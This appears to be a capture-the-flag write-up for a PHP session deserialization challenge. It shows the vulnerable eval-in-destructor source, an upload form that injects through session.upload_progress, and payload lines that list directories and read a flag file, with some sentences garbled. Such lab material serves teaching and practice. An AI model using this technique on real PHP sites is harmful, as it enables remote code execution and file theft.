Article Directory
Pre-knowledge
Session storage mechanism
The content of the session in php is not stored in memory, but is stored as a file. The storage method is determined by the configuration item session.save_handler, and the default is to store it as a file.
The stored file is named after sess_sessionid
php
: Default usage, format key name|key value (value processed by serialization function)php_serialize
: Format the value processed by the serialization functionphp_binary
: ASCII characters corresponding to the length of the key name + key name + value processed by the serialization function-
Use session.upload_progress for file inclusion and deserialization penetration
Just look at this article written by freebuf and
use session.upload_progress for file inclusion and deserialization infiltration
wp part
After opening the topic, after the code audit, it was found that there were not many exploitable points.
According to ini_set(‘session.serialize_handler’, ‘php’)
this sentence, it is speculated that there are related vulnerabilities in the serialization of objects in PHP.
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
Then let's go to phpinfo to check it, enabled=on means the upload_progress function is started, which also means that when the browser uploads a file to the server, php will store the detailed information of the file upload (such as upload time, upload progress, etc.) In the session; just POST a field named PHP_SESSION_UPLOAD_PROGRESS to the address, then you can assign the value of filename to the session.
Construct an upload form:
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="777" />
<input type="file" name="file" />
<input type="submit" />
</form>
Check again and find disable_functions
that the function system is disabled, then we can use other methods to view, remember to add the value in front of the value to |
print_r(scandir(dirname(__FILE__)));
view the current path through the phpinfo page_SERVER["SCRIPT_FILENAME"]
print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));